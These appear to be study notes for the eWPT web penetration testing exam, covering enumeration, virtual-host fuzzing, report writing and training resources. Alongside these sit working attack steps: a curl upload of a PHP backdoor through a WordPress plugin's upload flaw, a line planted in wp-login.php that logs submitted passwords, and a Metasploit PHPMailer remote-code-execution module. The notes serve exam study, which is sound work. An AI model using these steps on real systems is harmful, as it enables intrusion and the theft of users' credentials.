# eWPT

Best resources for preparing:

THM Nahamstore
<https://tryhackme.com/room/nahamstore>

THM Web Fundamentals Path

Portswigger's Web Security Academy
<https://portswigger.net/web-security>

HackerOne
<https://www.hackerone.com/videos>

Enumeration (DNS, subdomains, web technology fingerprinting):

```
dnsenum -p 20 -s 100 --threads 5 cbs.com
./subbrute.py cbs.com
whatweb site.com -v
```

User enumeration with patator: every response containing `Invalid Username` is dropped, so the usernames that survive the filter are the ones the application answers differently for (the account exists, only the password was wrong):

```
patator http_fuzz url=http://userenumeration.site/login.php method=POST \
  body='username=FILE0&password=FILE0' 0=/root/usernames.txt \
  follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'
```
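The same differential check in plain Python, as an added example (not part of the original notes or of patator): instead of guessing the error string, it first requests a random, certainly non-existent username and treats that response as the "bad username" signature; anything that differs is reported. The login site and its responses are constructed here so the block runs offline; `http_sender` is the live transport and assumes a form with `username`/`password` fields.

```python
"""Username enumeration through differential login responses (added example)."""
import secrets
from typing import Callable, Iterable

Sender = Callable[[str, str], str]  # (username, password) -> response body


def enumerate_users(send: Sender, candidates: Iterable[str], password: str = "x") -> list[str]:
    """Return the candidates whose login response differs from a random, non-existent user's."""
    # Baseline: a username that cannot exist; its response is the 'bad username' signature.
    baseline = send("zz" + secrets.token_hex(6), password)
    # Second probe guards against per-request noise (CSRF token, timestamp) in the body;
    # if the two baselines differ, the body must be normalised before comparing.
    if send("zz" + secrets.token_hex(6), password) != baseline:
        raise RuntimeError("login responses vary per request; normalise the body first")
    return [user for user in candidates if send(user, password) != baseline]


def http_sender(url: str) -> Sender:
    """Live transport for a real target (needs `requests`; not exercised offline)."""
    import requests

    session = requests.Session()

    def send(username: str, password: str) -> str:
        r = session.post(url, data={"username": username, "password": password}, allow_redirects=True)
        return r.text

    return send


# --- constructed stand-in for userenumeration.site/login.php (assumption) ---
_USERS = {"admin": "s3cret", "bob": "hunter2"}


def fake_login(username: str, password: str) -> str:
    """Simulates a form that leaks account existence through its error message."""
    if username not in _USERS:
        return "<p>Invalid Username</p>"
    if _USERS[username] != password:
        return "<p>Invalid Password</p>"
    return "<p>Welcome</p>"


if __name__ == "__main__":
    print(enumerate_users(fake_login, ["root", "admin", "alice", "bob"]))  # ['admin', 'bob']
```

Timing differences (password hashing only runs for existing users) leak the same information when the error text is identical; in that case compare response times against the baseline instead of the body.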

**Work the Flow exploit**

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FapjUpFsux90AImeWNI6K%2Fimage.png?alt=media\&token=db6badf6-614c-42dd-991a-fa03e66dfad7)

```
searchsploit "work the flow"
searchsploit worktheflow
```

The plugin is spotted in the WordPress plugins directory; its README gives the installed version to match against the exploit:

```
wordpress/wp-content/plugins
wordpress/wp-content/plugins/work-the-flow-file-upload/README.txt
```

Mirror the exploit and upload the backdoor through the unauthenticated jQuery File Upload handler the plugin ships:

```
searchsploit -m exploits/php/webapps/36640.txt

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" \
  http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public-assets/jQuery-File-Upload-9.5.0/server/php/index.php
```

By default that handler stores uploads in a `files/` directory next to `index.php`, so look for the shell under `.../server/php/files/backdoor.php`.

Credential harvesting after compromise: modify the wp-login.php page by inserting, right at the top (before the file's own `<?php`), a line that writes every POST body to a log file:

```
<?php file_put_contents('log.txt', file_get_contents('php://input'), FILE_APPEND); ?>
```

`FILE_APPEND` matters: without it each login overwrites the previous one. `log.txt` lands in the web root next to wp-login.php, so collect it and remove it when done.


**Simple PHP Shell**\
<https://github.com/heisway/simple-php-shell>

**Prevent Clickjacking**

The header must actually be sent (commented out it does nothing) and must go out before any output:

```
<?php
header('X-Frame-Options: SAMEORIGIN');
?>
```

Current browsers prefer the `Content-Security-Policy: frame-ancestors` directive, which overrides X-Frame-Options when both are present; `ALLOW-FROM` is obsolete and ignored.

PHPMailer vuln (CVE-2016-10033, argument injection into the `mail()` sendmail call):\
<https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html>

```
search phpmailer
use exploit/multi/http/phpmailer_arg_injection
set RHOSTS target
set WEB_ROOT /var/www/html
set LHOST ip
exploit
```

WEB_ROOT has to be the real document root: the module drops the payload there through the injected sendmail log option and then requests it over HTTP, so a wrong path means no shell.

SWF Investigator (Adobe's tool for analysing Flash .swf files)

Web services: append `?wsdl` to the endpoint to pull the service definition, e.g. soapexample.com/WS.php?wsdl

**Chaining vulns**\
Example: three vulnerabilities (a path traversal, an SSRF in an external piece of software, and a post-authentication RCE) chained into a full pre-auth RCE.

**Report**\
Want the report to be:

* Exhaustive
* Clear
* Good looking
* On time
* Adhering to goals

Executive Summary --> Vulnerability Report --> Remediation Report

**Intro for Executive Summary**

The purpose of this assessment and report is to identify any web application issues that could affect the ABC application and the web server hosting it, and to provide solutions to remedy these issues.

Use graphs, charts, stats and tables. Text should only be used to explain the charts and to give a final estimation of the state of security.

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F3DvIH2mQwGacvZzd4eQ8%2Fimage.png?alt=media\&token=0e79fce5-02bf-4d07-999e-43d2939d84ef)

**Resources to train:**

**Portswigger Web Security Academy labs**\
[**https://portswigger.net/web-security/all-labs**](https://portswigger.net/web-security/all-labs)

**THM Web Fundamentals Path**

**THM Nahamstore**\
<https://tryhackme.com/room/nahamstore>

Fuzzing virtual hosts (the request always goes to the same IP, only the Host header changes):

```
wfuzz -c -z file,/usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u "http://nahamstore.thm/" -H "Host: FUZZ.nahamstore.thm" --hw 65
```

`--hw 65` hides every response with 65 words, i.e. the page the server returns for unknown hosts; run once without the filter to learn that number for the target.
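The same Host-header fuzzing in plain Python, as an added example (not part of the original notes or of wfuzz): it measures the word count of the unknown-host response itself instead of hard-coding 65, then reports every name whose response differs. `fetch_live` is the real transport and assumes the target IP; the names and bodies below are constructed so the block runs offline.

```python
"""Virtual-host discovery by Host-header fuzzing with a word-count filter (added example)."""
import http.client
from typing import Callable, Iterable

BASE = "nahamstore.thm"


def fetch_live(host: str, ip: str = "10.10.10.10", path: str = "/") -> str:
    """Live transport (assumption: target at 10.10.10.10): connect to the IP, vary only Host."""
    conn = http.client.HTTPConnection(ip, 80, timeout=5)
    conn.request("GET", path, headers={"Host": host})
    body = conn.getresponse().read().decode(errors="replace")
    conn.close()
    return body


def word_count(body: str) -> int:
    """wfuzz's 'words' metric: whitespace-separated tokens."""
    return len(body.split())


def find_vhosts(fetch: Callable[[str], str], names: Iterable[str]) -> dict[str, int]:
    """Return {vhost: words} for every name whose response differs from the unknown-host page."""
    # Baseline: a host that certainly has no vhost gives the server's default response;
    # its word count is what wfuzz's --hw value hides.
    baseline = word_count(fetch(f"nonexistent-{BASE.replace('.', '-')}.{BASE}"))
    found: dict[str, int] = {}
    for name in names:
        host = f"{name}.{BASE}"
        words = word_count(fetch(host))
        if words != baseline:
            found[host] = words
    return found


# --- constructed responses (assumption) ---
_DEFAULT_PAGE = " ".join(["word"] * 65)
_VHOSTS = {"shop.nahamstore.thm": "<h1>NahamStore shop</h1> <p>order tracking and checkout</p>"}


def fake_fetch(host: str) -> str:
    return _VHOSTS.get(host, _DEFAULT_PAGE)


if __name__ == "__main__":
    print(find_vhosts(fake_fetch, ["www", "shop", "dev"]))  # {'shop.nahamstore.thm': 6}
```

A real vhost whose page happens to have the same word count as the default is hidden by this filter, which is why wfuzz offers status, length and line filters too; compare more than one metric before concluding a name is dead.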

**Burp Suite Scanner - issue definitions with their ratings**

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F8QUUkv90vaSWNhVzy5qe%2F2022_06_23_15_41_14_Greenshot%20Burp%20scanner%20issue%20definition.jpg?alt=media\&token=b0d38e7f-5265-4e74-aeec-d7453f7d5cb5)

**What can Burp help me with?**

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2F98bp826I5DNZwebnJWg0%2F2022_06_23_15_52_15_Greenshot%20what%20can%20burp%20help%20me%20with.jpg?alt=media\&token=0035371a-0aa3-4e32-a18e-f3df2f8588c1)

**DanielMiessler SecLists**

<https://github.com/danielmiessler/SecLists>

**When to fuzz?**

![](https://410895813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MlKjYaxo0rpR2Jsapi3%2Fuploads%2FDAAXEg0k0VicOBWf0Djg%2F2022_06_23_16_30_20_Greenshot%20when%20to%20fuzz.jpg?alt=media\&token=0e7d5f7e-60b5-48b2-a787-41e3c6c085d1)

* Do not rely on automated tools alone; verify by hand
* Take good notes
* Know how to chain vulnerabilities together to achieve greater impact
* Test ALL the parameters; the attack point can be in the most unexpected place
* Do not forget to include a PoC, CVSS scoring and mitigation recommendations in the report

Flash, CORS and NoSQL databases are not relevant for the exam. Of those three it is still a good idea to invest some time into CORS, and a little into NoSQL databases.
